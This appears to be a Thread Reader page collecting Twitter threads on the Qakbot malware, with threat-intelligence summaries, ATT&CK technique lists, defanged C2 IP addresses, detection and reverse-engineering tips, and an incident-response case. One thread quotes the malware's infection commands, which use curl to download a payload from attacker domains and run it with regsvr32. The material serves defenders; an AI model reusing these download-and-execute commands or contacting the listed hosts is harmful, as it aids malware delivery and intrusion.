Discover and read the best of Twitter Threads about #Qakbot

Most recents (10)

#Qakbot threat actors are on fire πŸ”₯ recently. We observed a high volume of attacks both internally and through external sources. Here is a brief summary of their current attack chain. 🧡1/6
Qakbot's main initial access vector is still through malspam campaigns βœ‰οΈ. They use email thread hijacking for their spam messages to increase the likelihood that the victim user will interact on the message. 🧡2/6 Image
After a short excursion to OneNote files, both main active #Qakbot botnets have currently returned to using HTML smuggling to deliver the initial attack payload. This technique has already been seen in many campaigns last year. 🧡3/6
Read 6 tweets
#Qakbot once again had some surprises 🎁 for us this week. See below for a brief overview of what we found. 🧡 1/6
First and foremost, #Qakbot seems to have departed from their usual use of LNK files to trigger execution. Instead they now present .vbs or .js files at the root folder of the disk image πŸ’Ώ. 🧡 2/6 Image
This alone would not be significant, since we have observed πŸ” .js and .vbs files in Qakbots infection chain before. Now however these files also contain a signature that apparently bypasses Windows MotW / SmartScreen warnings. 🧡 3/6 Image
Read 6 tweets
#Qakbot Infection New TTPs 🚨

[+] Deliver ISO (T1204.002)
[+] DLL Search Order Hijacking (T1574.001)πŸ”₯
[+] Regsvr32 (T1218.010)
[+] Process Hollowing (T1055.012)
[+] Discovery (TA0007)
[+] Credentials from Web Browsers (T1555.003)
[+] Data from Local System (T1005)
#Qakbot C2 server:
IP: 92.27.86[.]48
Port: 2222

Additional C2 IP:
23.111.114[.]52
#Qakbot initial exec flow #DFIR:
ISO > LNK > cmd.exe /c control.exe > e:\control.exe > regsvr32.exe msoffice32.dll > Injection
Read 4 tweets
#Qakbot New TTPs IMG File Infection

[+] IMG File instead of ISO πŸ”₯
[+] VBS Script (ShellExecute) instead of LNK πŸ”₯
[+] .tmp (DLL loader) exec via Regsvr32.exe
[+] Process Injection
[+] Discovery commands
[+] C2 connection

#DFIR exec flow: img > vbs > tmp > injection
Thank you @pr0xylife for sharing the sample:

bazaar.abuse.ch/sample/ac7c130…
#Qakbot C2 server:

IP: 70.121.198[.]103
Port: 2078
Artifact: POST /t5 HTTP/1.1

Additional C2 IPs:
200.93.14[.]206
174.115.87[.]57
102.157.73[.]215
98.30.233[.]14
94.70.37[.]145
82.31.37[.]241
172.90.139[.]138
Read 4 tweets
🐲 Ghidra Tips 🐲- Malware Encryption and Hashing functions often produce byte sequences that are great for #Yara rules.

Using #Ghidra and a Text Editor - You can quickly develop Yara rules to detect common malware families.
(Demonstrated with #Qakbot)

[1/20]
#Malware #RE
[2/20]
Hashing and encryption functions make good targets for #detection as they are reasonably unique to each malware family and often contain lengthy and specific byte sequences due to the mathematical operations involved.

These characteristics make for good Yara rules 😁
[3/20] The biggest challenge is locating the functions responsible for hashing and encryption. I'll leave that for another thread, but for now...

You can typically recognize hashing/encryption through the use of bitwise operators inside a loop. (xor ^ and shift >> etc).
Read 22 tweets
#Qakbot Dumpulator Script has now been added to Github! πŸ˜€

This script is capable of dumping decrypted strings from the encrypted string table used by recent Qakbot malware.

1/ (notes and details below)
#malware #qakbot #dumpulator #RE ImageImageImageImage
2/ The script *should* work on the samples that I have provided in the readme, however you may need to change some register values to get it to work on different samples.

In particular, "dp.regs.ecx" and "dp.regs.esp+0x4" may need to be changed. As these ... Image
3/ cont'd... as these values point to the encrypted string table and key, which will differ between samples. You can re-use the same dump file if you wish, as the code will likely remain the same.
Read 11 tweets
#Qakbot - AA - url > .zip > .lnk > .dll

MD %HOMEPATH%\XL\zAkOR

curl.exe --output %HOMEPATH%\XL\zAkOR\vE0oHQ.KtIB.q_qw https://fratelliperu.]com/aYMst/A.png

regsvr32 "%HOMEPATH%\XL\zAkOR\vE0oHQ.KtIB.q_qw

bazaar.abuse.ch/sample/617c94a…

IOC
github.com/pr0xylife/Qakb… Image
++

MD "%HOMEPATH%\qI\ZXOjp

curl.exe --output %HOMEPATH%\qI\ZXOjp\DSVa.BVLl.ae https://arboldeaventuras.]com/uAY4Y/C.png

regsvr32 %HOMEPATH%\qI\ZXOjp\https://t.co/G7DaSz06RB

bazaar.abuse.ch/sample/ba7b459…

bazaar.abuse.ch/sample/500f852…
Read 3 tweets
1/ Visibility is key for eradication πŸ₯·

In a recent IR case, the TA created persistences with #QakBot on almost every system in the network.

If only individual systems in the network were forensically examined, one or more infected systems would undoubtedly be missed.

🧡
2/ By examing the network connections made by the clients & servers with a forensic agent, it is apparent that QakBot has made a process injection into the following two processes:

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\mobsync.exe
3/ The analysis of the network connections gives us active C2 addresses that we can use for additional hunting inside the network (and in the FW logs).
Read 10 tweets
ICYMI, @PwC_UK’s 2020 #threatintel Year in Retrospect report is out now! All team contributed but h/t to @KystleM_Reid! :fire: You can check it out here: pwc.to/2ZPx7fo In this thread, I will summarise some of what I thought were key findings: πŸ§΅πŸ‘‡ 1/n
#Ransomware has become the most significant cyber security threat faced by organisations, irrespective of industry/location. TTPs have pivoted to mass data exfiltration prior to encryption, along with leaks & extortion. S/o to @andyp346 for all your work countering this.πŸ™ 2/n
In 2020, 86% of the incidents that PwC’s Incident Response team responded to were attributable to cyber criminals. 79% of leaks happened in 2nd half of 2020. Our data sees Manufacturing, TMT, & Professional Services most impacted. 3/n
Read 19 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!